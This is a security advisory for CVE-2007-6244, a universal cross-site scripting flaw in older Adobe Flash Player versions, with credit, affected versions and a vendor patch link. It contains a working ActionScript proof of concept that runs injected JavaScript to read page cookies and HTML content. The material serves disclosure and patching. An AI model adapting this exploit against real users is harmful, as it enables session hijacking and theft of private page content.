|
|
|
|
| |
Credit:
The information has been provided by Collin Jackson.
The original article can be found at: http://crypto.stanford.edu/advisories/CVE-2007-6244/
|
| |
Vulnerable Systems:
* Adobe Flash Player version 9.0.48.0 and earlier
* Adobe Flash Player version 8.0.35.0 and earlier
* Adobe Flash Player version 7.0.70.0 and earlier
Vendor response:
The vendor has released appropriate patches available at: http://www.adobe.com/support/security/bulletins/apsb07-20.html
Exploit:
package {
import flash.display.Sprite;
import flash.net.*;
import flash.utils.*;
public class uxssdemo extends Sprite {
public function uxssdemo() {
setTimeout(DoAttack, 1000);
}
public function DoAttack():void {
var request:URLRequest =
new URLRequest('javascript:alert("Cookie: "+document.cookie+"\\n\\nContent: \\n\\n" + document.lastChild.innerHTML);window.close();');
navigateToURL(request, 'tg');
}
}
}
CVE Information:
CVE-2007-6244
|
|
|
|
|